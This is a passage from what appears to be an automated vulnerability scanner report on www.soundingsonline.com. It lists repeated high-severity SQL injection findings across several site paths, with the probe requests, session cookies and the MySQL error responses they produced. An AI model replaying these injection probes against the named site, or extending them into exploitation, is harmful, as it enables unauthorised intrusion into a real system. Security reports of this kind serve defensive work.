Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-gear?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.15. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-powerboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-powerboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.16. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-sailboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-sailboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.17. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/q-a-a?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/q-a-a?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.18. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/sea-savvy?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/sea-savvy?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.19. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/tech-talk?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/tech-talk?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.20. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/used-boat-review?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/used-boat-review?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.21. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /calendar?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /calendar?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.22. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /career-opportunities?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:42 GMT
